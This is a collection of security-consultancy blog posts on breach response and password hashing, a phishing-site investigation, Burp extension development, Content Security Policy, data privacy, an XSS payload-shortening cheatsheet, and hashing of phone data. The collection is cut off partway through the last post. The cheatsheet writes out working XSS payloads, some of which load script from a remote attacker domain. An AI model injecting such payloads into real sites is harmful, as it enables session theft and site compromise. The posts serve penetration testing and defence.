What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers; it just needs to give users an idea of how they are affected, and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce both the cost of protecting it and the chance of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking, and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be completed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally, we’d like to see a single hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large-scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in a precomputed rainbow table. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.
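Put together, those two properties (a per-password random salt plus an iteration count that raises the work factor) look something like the following minimal Python sketch. It is illustrative only, not Kickstarter’s actual code, which hasn’t been published.

import hashlib
import hmac
import os

ITERATIONS = 100000  # illustrative; tune so a single check costs a noticeable fraction of 100 ms

def hash_password(password, salt=None, iterations=ITERATIONS):
    # A long, random, unique salt per password defeats precomputed rainbow tables
    if salt is None:
        salt = os.urandom(16)
    digest = salt + password.encode("utf-8")
    for _ in range(iterations):  # every extra round multiplies the attacker's work per guess
        digest = hashlib.sha1(digest).digest()
    return salt, digest

def verify_password(password, salt, stored_digest, iterations=ITERATIONS):
    candidate = hash_password(password, salt, iterations)[1]
    return hmac.compare_digest(candidate, stored_digest)  # constant-time comparison

Even with a six-figure iteration count this is only a patch over SHA1’s speed, which is exactly why the move to bcrypt described next matters.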

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount of computation required to test a password guess as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose-built to make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.
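For comparison, here is what that looks like with the commonly used Python bcrypt package (a sketch assuming that library; Kickstarter hasn’t said what they use):

import bcrypt

def hash_password(password):
    # gensalt() produces a random salt and embeds the work factor in the output;
    # raise rounds over time as hardware gets faster
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt(rounds=12))

def verify_password(password, stored_hash):
    # checkpw re-derives the hash using the salt and cost stored alongside it
    return bcrypt.checkpw(password.encode("utf-8"), stored_hash)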

Gutting a Phish

In the news lately there have been countless examples of phishing attacks becoming more sophisticated, but it’s important to remember that the entire “industry” is a bell curve: the most dedicated attackers are upping their game, but advancements in tooling and automation are also letting many less sophisticated players get started even more easily. Put another way, spamming and phishing are coexisting happily as both massive multinational business organizations and smaller cottage-industry efforts.

One such enterprising but misguided individual made the mistake of sending a typically blatant phishing email to one of our Neohapsis mailing lists, and someone forwarded it along to me for a laugh.

[Image: the phishing email, as it appeared in a mailbox]

As silly and evident as this is, one thing I’m constantly astounded by is how the proportion of people who will click never quite drops to zero. Our work on social engineering assessments bears out this real world example: with a large enough sample set, you’ll always hook at least one. In fact, a paper out of Microsoft Research suggests that, for scammers, this sort of painfully blatant opening is actually an intentional tool: it acts as a filter that only the most gullible will pass.

Given the weak effort put into the email, I was curious to see if the scam got any better if someone actually clicked through. To be honest, I was pleasantly surprised.

[Image: the phishing site, a combination of legitimate Apple code and images and a form added by the attacker]

The site is dressed up as a reasonable approximation of an official Apple site. In fact, a look at the source shows that there are two things going on here: some HTML/CSS set dressing and template code that is copied directly from the legitimate Apple site, and the phishing form itself which is a reusable template form created by one of the phishers.

Naturally, I was curious where data went once the form was submitted. I filled in some bogus data and submitted it (the phishing form helpfully pointed out any missing data; there is certainly an audacity in being asked to check the format of the credit card number that’s about to be stolen). The data POST went back to another page on the same server, then quickly forwarded me on to the legitimate iTunes site.

[Image: Burp capture of the form data being POSTed to the same server and then forwarded on to the legitimate iTunes site]

This is another standard technique: if a “login” appears to work because the victim was already logged in, the victim will often simply proceed with what they were doing without questioning why the login was prompted in the first place. During social engineering exercises at Neohapsis, we have seen participants repeatedly log into a cloned attack site, with mounting frustration, as they wonder why the legitimate site isn’t showing them the bait they logged in for.

Back to this phishing site: my application security tester spider senses were tingling, so I felt that I had to see what our phisher was doing with the data being submitted. To find out, I replayed the submit request with various types of invalid data, strings that should cause errors depending on how the data was being parsed or stored. Not a single test string produced any errors or different behavior. This could be an indication that any parsing and processing is being done carefully and correctly, but the far more likely case is that they’re simply doing no processing and dumping it all straight out as plain text.

Interesting… if harvested data is simply being dumped to disk, where exactly is it going? Burp indicates that the data is being POSTed to a harvester script at Snd/Snd.php. I wonder what else is in that directory?

[Image: directory listing of the phishing site, with the loot stash clearly visible]

That result.txt file looks mighty promising… and it is.

[Image: the format of the result.txt file]

These are the raw results dumped from victims by the harvester script (Snd.php). The top entry is dummy data that I submitted, and when I checked it, the file was entirely filled with the various dummy submissions I had done before. It’s pretty clear from the results that I was the first person to actually click through and submit data to the phish site; actually pretty fortunate, because if a victim did enter legitimate information, the attacker would have to sort it out from a few hundred bogus submissions. Any day that we can make life harder for the bad guys is a good day.

So, the data collection is dead simple, but I’d still like to know a bit more about the scam and the phishers if possible. There’s not a lot to go on, but the tag at the top of each entry seems unique. It’s the sort of thing we’re used to seeing when hackers deface a website and leave a tag to publicize the work:

------------+| $ o H a B  Dz and a m i r TN |+------------

Googling some variations turned up a Google cache of a forum post that’s definitely related to the phishing site above; it’s either the same guy, or someone else using the same tool.

[Image: a post in a carder forum, offering to sell data in the same format as that generated by the phishing site above]

A criminal using the name AppleFullz is selling complete information dumps of login details and credit card numbers plus CVV numbers (called “fulls” in carder forums) captured in the exact format that the Apple phish used, and even provides a sample of his wares (insult to injury for the victim: not only was his information stolen, but it’s being given away as the credit card fraud equivalent of the taster trays at the grocery store). This carder is asking for $10 for one person’s information, but is willing to give bulk discounts: $30 for 5 accounts (this is actually a discount over the sorts of prices normally seen on carder forums; Krebs recently reported that Target cards were selling for $20-$100 per card. I read this as an implicit acknowledgement by our seller that this data is much “dirtier” and that the seller is expecting buyers to mine it for legitimate data). The tools being used here are a combination of some pre-existing scraps of PHP code widely used in other spam and scam campaigns (the section labeled “|INFO|VBV|”), and a separate section added specifically to target Apple IDs.

Of particular interest is that the carder provided a Bitcoin address. For criminals, Bitcoin has the advantage of anonymity but the disadvantage that transactions are public. This means that we can actually look up how much money has flowed into that particular Bitcoin address.

[Image: ill-gotten gains: the Bitcoin blockchain records transfers into the account used for selling stolen Apple IDs and credit card numbers]

From November 17, when the forum posting went up, until December 4th, when I investigated this phishing attempt, he has received Bitcoin transfers totaling 0.81815987 BTC, which is around $744.53 (based on the BTC value on 12/4). According to his price sheet, that translates to a sale of between 74 and 124 records: not bad for a month of terribly unsophisticated phishing.
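For anyone who wants to check that estimate, it is a quick back-of-the-envelope calculation using only the figures quoted above:

btc_received = 0.81815987
usd_value = 744.53                     # approximate USD equivalent on 12/4

single_price = 10.0                    # $10 for one record
bulk_price = 30.0 / 5                  # $6 per record at the 5-for-$30 rate

print(usd_value / single_price)        # ~74 records if everything sold individually
print(usd_value / bulk_price)          # ~124 records if everything sold in bulk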

Within a few hours of investigating the initial phishing site, it had been removed. The actual server where the phish site was hosted was a legitimate domain that had been compromised; perhaps the phisher noticed the volume of bogus traffic and decided that the jig was up for that particular phish, or the system administrator got tipped off by the unusual traffic and investigated. Either way the phish site is offline, so that’s another small victory.

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kinds of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is a very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Even though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()
            newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.
[Image: a request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a request looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.]

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

[Image: the interactive Jython shell tab added to the Burp interface]

This shell was originally intended to work with the classes and objects defined in jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.
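For example, a quick exploratory session along these lines lets you poke at a real captured request before committing anything to extension code. This is a sketch; exactly how the console exposes the callbacks reference depends on the jython-burp-api build you load, so adjust the first line accordingly.

# 'Burp' is the object pre-defined by the console; here we assume it gives us
# the IBurpExtenderCallbacks methods directly (adjust if it's held in an attribute)
cb = Burp
helpers = cb.getHelpers()

history = cb.getProxyHistory()          # array of IHttpRequestResponse items
item = history[len(history) - 1]        # the most recently proxied request

info = helpers.analyzeRequest(item)     # IRequestInfo for the captured request
print info.getMethod(), info.getUrl()
print list(info.getHeaders())

body = item.getRequest()[info.getBodyOffset():]
print helpers.bytesToString(body)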

[Image: exploring Burp API objects from the Jython shell tab]

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services. SoapUI Pro even includes a variety of web-service specific payloads for security testing.

[Image: the main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducibility for a discovered vulnerability.]

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

[Image: create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service]

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are tons of tools out there, including the official Burp examples, burpextensions.com, and more findable on GitHub. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Defeating Cross-site Scripting with Content Security Policy

If you have been following Neohapsis’ @helloarbit or @coffeetocode on Twitter, you have probably seen us tweeting quite a bit about Content Security Policy. Content Security Policy is an HTTP header that allows you, the developer or security engineer, to define where web applications can and cannot load content from. By defining a strict Content Security Policy, the developers of web applications can almost completely mitigate cross-site scripting and other attacks.

CSP functions by allowing a web application to declare the sources from which it expects to load scripts, allowing the client to detect and block malicious scripts injected into the application by an attacker.

Another way to think about Content Security Policy is as a source whitelist. Typically, when an end user makes a request for a web page, the browser trusts whatever output the server delivers. CSP, however, limits this trust model by sending a Content-Security-Policy header that allows the application to specify a whitelist of trusted (expected) sources. When the browser receives this header, it will only render or execute resources from those sources.
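As a purely illustrative example (the host names are placeholders), a policy like this tells the browser to load scripts only from the site’s own origin and one known CDN, and to load no plugins at all:

Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'

Because inline scripts are not allowed unless 'unsafe-inline' is explicitly added, a script block injected into the page by an attacker fails this whitelist and is never executed.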

In the event that an attacker does have the ability to inject malicious content that is reflected back to the user, the injected script will not match the source whitelist and will not be executed.

Traditional mechanisms to mitigate cross-site scripting are to HTML encode or escape output that is reflected back to a user as well as perform rigorous input validation. However due to the complexity of encoding and validation, cross-site scripting may crop up in your website.  Think of CSP as your insurance policy in the event something malicious sneaks through your input validation and output encoding strategies.

Although we at Neohapsis Labs have been researching Content Security Policy for a while, we found that it’s a complicated technology that has plenty of intricacies. After realizing that many users may run into the same issues and confusion we did, we decided to launch cspplayground.com to help educate developers and security engineers on how to use CSP, as well as to provide a way to validate your own complex policies.

CSP Playground allows you to see example code and practices that are likely to break when applying CSP policies.  You can toggle custom policies and watch in real-time how they affect the playground web application.  We also provide some sample approaches on how to modify your code so that it will play nicely with CSP.  After you have had time to tinker around, you can use the CSP Validator to build out your own CSP policy and ensure that it is in compliance with the CSP 1.1 specification.

The best way to learn CSP is by experimenting with it. We at Neohapsis Labs put together the cspplayground.com site for exactly that reason, and we suggest you check it out to learn more.

Repurposing Data…or, “You’re Going To Do WHAT?”

By Patrick Madden

Boston.com published an AP story that Google is implementing an opt-in beta test to include users’ email in search results. In other words, when a user is logged in at Gmail, performing a plain old Google search will turn up emails in addition to web pages. Privacy concerns have been flagged and noted, and the existence of matching emails will be presented using a collapsed control off to the side of the main results. But will this really do the job? Google searches are shoulder-surfed all the time, so simply disclosing even the existence of a matching email can potentially put people in hot water depending on the search terms.

Google’s beta is another instance in a disturbing trend to repurpose user data in ways that weren’t intended or anticipated when the users provided their data. As the AP article reminds us, Google had previously ventured into this territory with Google Buzz before running into legal challenges. Facebook has regularly and unashamedly repurposed ancient postings, many of them ephemeral “status” updates, into users’ easily browsed timelines, though it could be debated that this at least makes it more clear that the old posts do still exist.

In my AppSec work I regularly find “Insufficient Authorization” in sites and products I assess. These findings are generally relative to the app owner’s perspective and answer the question, “Can my user perform activities or access data in ways I don’t want?” When I look at repurposed user data, though, I see an exactly analogous situation but in the opposite direction…from the user perspective, the question becomes, “Can my service provider use my data in ways I don’t want?”

[The answer, of course, is in the terms of service wherein the providers claim rights to use and disseminate data provided to them, even if they don’t claim ownership of the actual data. Apparently, then, there’s no basis to complain about any of this, and Google, Facebook, and others will simply do what they want. That’s slightly pessimistic, but it’s not that far from what we’ve seen so far.]

When a finding of “Insufficient Authorization” appears to be the result of intended functionality, application owners are asked to review their business requirements versus the vulnerability, identify alternative means of meeting the business requirements, or reconsider the functionality altogether. On the other hand, ordinary end users are terrible at doing all of these, if they even care in the first place. Who can state their personal “business requirements” for social media and other free services, who has gone to the trouble of identifying the risks inherent in sharing personal data with third parties (and quantifying the risks? Pfft!), and who’s willing to reconsider the use of a service they’ve invested themselves in substantially, even though no payment was involved?

Repurposing of user data happens because a provider thinks they’ve found a way to make more money, and because one-sided terms of service make few concessions allowing users to control how their own data gets used. At the same time, that repurposing should never increase user risk exposure by default, at least not in my own personal utopia. Maybe we should all be looking for and flagging “Insufficient Authorization” findings from the user’s perspective. And if the Gmail feature goes live in production with no option to disable it, perhaps I can use separate email and search providers to segregate functionality and mitigate risk.

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go-to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. E.g. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… E.g. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. E.g. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. That’s still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. E.g. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think jQuery) loaded, you can call their functions instead of your own. E.g. if they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at just 15 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes in at exactly 20 characters, which is within my limit.
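If you want to double-check payload lengths against a server-side limit before trying them, a couple of lines of Python will do the counting:

payloads = [
    "<script src=/>",                # 14 characters
    "<script src=ab.cd></script>",   # 27 characters
    "<b onclick=a()>",               # 15 characters
    "<b onclick=alert(1)>",          # 20 characters
]
for p in payloads:
    print("%2d  %s" % (len(p), p))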

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticeable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment below and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

Pass the iOS Privacy Salt – Hashing Does NOT Guarantee Privacy.

By Kate Pearce, Neohapsis & Neolabs

There has been a lot of concern and online chatter about iPhone/mobile applications and the private data that some send to various parties. Starting with the discovery of Path sending your entire address book to their servers, it has since also been revealed that other applications do the same thing. The other offenders include Facebook, Twitter, Instagram, Foursquare, Foodspotting, Yelp, and Gowalla. This corresponds nicely with some research I have been doing into device ID leakage on mobile devices, where I have seen the same leakages, excuses, and techniques applied and abused as those discussed around the address book leakages.

I have observed a few posts discussing the issues and proposing solutions. These solutions range from requiring iOS to request permission for address book access (as it does for location) to advising developers to hash sensitive data before sending it and compare hashes server side.

The first idea is a very good one; I see few reasons a device’s geolocation is less sensitive than its address book. The second, as given, is only partial advice, however; if taken as it appears in Martin May’s post or Matt Gemmell’s arguments, it will not solve the privacy problems on its own. This is because 1. anonymised data isn’t anonymous, and 2. no matter what hashing algorithm you use, if the input material is sufficiently constrained you can compute, or precompute, all possible values.

Martin May’s two characteristics of a hash [link]:

  • Identical inputs will yield the same hash
  • It is virtually impossible to deduce the original input from a hash if a strong hashing algorithm is used.

This is because, of these two characteristics, the privacy implications of the first are not fully discussed, and the second is incorrect as stated.

 Hashing will not solve the privacy concerns because:

  • Hashing Data does not Guarantee Privacy (When the same data is input)
  • Hashing Data does not Guarantee Secrecy (When the input values are constrained)

The reasons, which those posts do not fully discuss, center on the fact that real-world input is constrained, not infinite. Telephone numbers are an extreme case of this, as I will discuss later.

A quick primer on hashing

Hashing is a destructive, theoretically one-way process where some data is taken and put through an algorithm to produce some output that is a shadow of the input. Like a shadow, the same output is always produced by the same input, but not the other way around. (Same car, same shadow).

A very simple example of a hashing function is the modulus (or remainder). For instance the output from 3 mod 2 is the remainder when 3 is divided by 2, or 1. The percent sign is commonly used in programming languages to denote this operation, so similarly

                1 % 3 is 1, 2 % 3 is 2, 3 % 3 is 0, 4 % 3 is 1, 5 % 3 is 2, etc.

If you take some input, you get the same output every time from the same hashing function. The reason the hashing process is one way is because it intentionally discards some data about the original. This results in what are called collisions, and we can see some in our earlier example using mod 3: 1 and 4 give the same hash, as do 2 and 5. The example given will cause collisions roughly one time in three, however modern strong hashing functions are a great deal more complex than modulo 3. Even the “very broken” MD5 has collisions occur only about one time in every 2^24, or 1 in ~17 000 000.
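The collision behaviour is easy to see by running the toy example (a trivial Python sketch of the modulo “hash” above):

def toy_hash(n):
    return n % 3                      # keeps only the remainder, discarding the rest

for n in range(1, 7):
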